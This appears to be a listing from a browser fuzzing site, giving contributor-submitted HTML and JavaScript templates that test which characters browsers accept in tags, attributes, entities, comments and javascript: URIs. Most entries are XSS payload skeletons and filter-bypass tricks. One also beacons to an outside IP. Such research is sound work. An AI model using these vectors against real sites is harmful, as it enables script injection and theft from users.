2,442,825 Successful fuzzes

Fuzz Vectors

All vectors

Description Vector Created by
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
test3_kinmen <!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)> @kinmenhacker
String quotes in JS context <script>s*num* = *chr**num**chr*;if (typeof s*num* == "string" && s*num* == "*num*") logChr(*num*);</script> @blubbfiction
before_img <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @han7er
o replacement in event handlers <img src=xx:xx *chr*nerror=logChr(*num*)> @blubbfiction
Characters that close tags <script*chr*logChr(*num*)</script> @blubbfiction
Valid characters between attribute and value instead of <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Replacement characters for between attribute and value <img src=xx:xx onerror*chr*logChr(*num*)> @blubbfiction
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters that separate JavaScript object key and value <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> @peksa
JavaScript operators that separate objects and scopes <script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script> @peksa
JavaScript operators that evaluate argument in variable assignment <script> var v = {}*chr*logChr(*num*) </script> @peksa
Things that break from URIs javascript comments <a href="javascript://*chr*logChr(*num*)">aaa</a> @0xAli
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that start JavaScript double quote strings <script> *chr*"; logChr(*num*) </script> @peksa
Characters that escape JavaScript single line comments <script> // hmm *chr*logChr(*num*) </script> @peksa
Ignored characters in javascript protocol uris <script> var a = document.createElement('a'); a.href = "java\u*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
stuff <!-- sample vector --> <img src='xx:xx*chr*' onerror='logChr(*num*) baz= '> @largenocream
Characters that separate JavaScript assignment statements <script> var a={}*chr*b={}&logChr(*num*); </script> @Giutro
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that allow a new statement to begin2 <script> var a={}*chr*b=logChr(*num*); </script> @tifkin_
Characters that allow a new statement to begin <script> var a={}*chr*logChr(*num*); </script> @tifkin_
testquote <!-- sample vector --> <img src=xx:xx onerror=logChr(*num*)*chr*"> @matttiko
testabc <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @matttiko
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters that can be used close tags2 <script>logChr(*num*)<*chr*script></script> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
img tag overflow2 <img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
img tag overflow <img src=xx:xx *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)> @kinmenhacker
fuzzer set2 <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
html5 article <article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article> @kinmenhacker
Connect back <img src="http://140.134.25.107/?chr=*chr*&num=*num*" onerror=logChr(*num*)> @kinmenhacker
Test iOS html5 <audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio> @kinmenhacker
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
digits <script>/^\d$/.test('*chr*')&&logChr(*num*);</script> @garethheyes
new lines <script> if(/\s/.test('*uni*')&&!/./.test('*uni*'))logChr(*num*) </script> @garethheyes
spaces <script> if(/\s/.test('*chr*'))logChr(*num*) </script> @garethheyes
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
Characters preceding function call inside throw block <body onload=throw[onerror=a=*chr*logChr(*num*),a]> @JohnathanKuskos
chr before alert(1) <input onfocus=*chr*:alert(1) autofocus> @Mramydnei
character between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
characters that behave like equal signs in attribute value <img src== onerror="a*chr*logChr(*num*)"> @JohnathanKuskos
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
test for tag name <*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4* @kinmenhacker
Characters that dont inhibit eventhandlers <img src=xx:xx o*chr*nerror=logChr(*num*)> @tifkin_
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
wwwemogiccom <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*num**datajstest4**datacsspropertynames**datacsspropertynames* @vpelss
Characters that make a double quote valid <script> *chr*"; logChr(*num*); </script> @tifkin_
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters that will be mutated to a correct URI 5 <ifr*chr*ame id="lol*num*" src="http://shazzer.co.uk" onload=logChr(*num*);> <i>:)</i> </iframe> @avlidienbrunn
Characters that will be mutated to a correct URI 4 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/http:\/\/shazzer/.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://*chr*shazzer.co.uk" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
XSS Vector Command Tag <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>*datajscsspropertynames* @rafaybaloch
Characters that will be mutated to a correct URI 3 <script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/uk\//.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://shazzer.co.uk*chr*break" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe> @avlidienbrunn
Characters that can be used close tags <script>logChr(*num*)<*chr*script> @tifkin_
Characters allowed to hex encodings of javascript variables <script> lo\u*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed to hex encode javascript <script> lo\*chr*0067Chr(*num*); </script> @tifkin_
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
Characters allowed between JS function names and parentheses <script> logChr*chr*(*num*); </script> @tifkin_
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
Characters that result in multiline strings <script> var a = "*chr* "; logChr(*num*); </script> @tifkin_
Characters that complete single quote <script> var a=*chr*'; logChr(*num*); </script> @tifkin_
Characters allowed between property accessor and property <script> if(document.*chr*body === document.body) { logChr(*num*); } </script> @tifkin_
Characters that escape escapes <script> var x = "*chr*\"; logChr(*num*); </script> @JohnathanKuskos
Characters that break out of quoted attributes2 <img src="1*chr* onerror="logChr(*num*)"> @tifkin_
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
Characters allowed between 2 consecutive functions <script> function a() {} </script> <img src=1 onerror="a()*chr*logChr(*num*)"> @tifkin_
Characters allowed before single functions in event handlers <img src=1 onerror="*chr*logChr(*num*)"> @tifkin_
Characters that can set event handlers3 <img src=1 onerror*chr*"logChr(*num*)"> @tifkin_
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
Characters that break attribute names <img src=# aaa*chr*onerror="logChr(*num*)"> @albinowax
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
Characters allowed after string multiline separator <script> var x = "asdf\*chr* asdf"; logChr(*num*); </script> @tifkin_
Characters allowed between attributes <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @tifkin_
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
Characters after javascript uri <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @insertScript
characters allowed in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Characters before javascript uri <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @insertScript
Easter challenge min sequence 2 <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
Easter challenge min sequence <script> str=*datajstest*+*datajstest2*+*datajstest3*+*datajstest4*+*datajstest5*+''; result=''; try{result=eval(str)}catch(e){}; if(result === 2147483647) { customLog(str); } </script> @garethheyes
SVG script <svg><script*chr*>logChr(*num*)</script></svg> @garethheyes
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
JS Property check middle character <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> @garethheyes
JS Property check ending character <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> @garethheyes
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed within an attribute name (on()load) "'><img src="xx:xx" on*chr*error="log(*num*);"> @skeptic_fx
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
Equals equivalent signs in attributes <!-- sample vector --> <img src=xx:xx onerror*chr*logChr(*num*)> @WisecWisec
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
is my browser leaking location <iframe src=http://businessinfo.co.uk onload="if(/^http:\/\/businessinfo.co.uk\/?/.test(this.contentWindow.location)){logBoolean(true);}else{logBoolean(false)}"></iframe> @garethheyes
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed inside jsurl <a href="java*chr*script:alert(1)" id="fuzzelement*num*">test</a> @avlidienbrunn
justatest2 <!-- sample vector --> <img*chr*src=xx:xx onerror=logChr(*num*)> @evilcos
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Cookie fuzzing <script> document.cookie='*chr*'; if(document.cookie !== '*chr*') { logChr(*num*,document.cookie); } </script> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
Characters allowed as vbscript variables <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> @garethheyes
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for firing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
aaaaa <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @goroasd
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes
img srcX onerroralert(1) <div style="color:red'{}*chr* x:expression(logChr(*num*))*chr*">.</div> @qbye
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Marios challenge <*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*><script>if(test == "1") parent.customLog('<*datahtmlelements* value="1" *datadhtmlprops*="test" *dataevents*="test" *datahtmlattributes*="test">1</*datahtmlelements*>');</script> @0xAli
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Eating backslash <img src=xx:xx onerror="x='*chr*\',logChr(*num*)//'"> @garethheyes
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Hex characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Characters allowed after asterisk in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
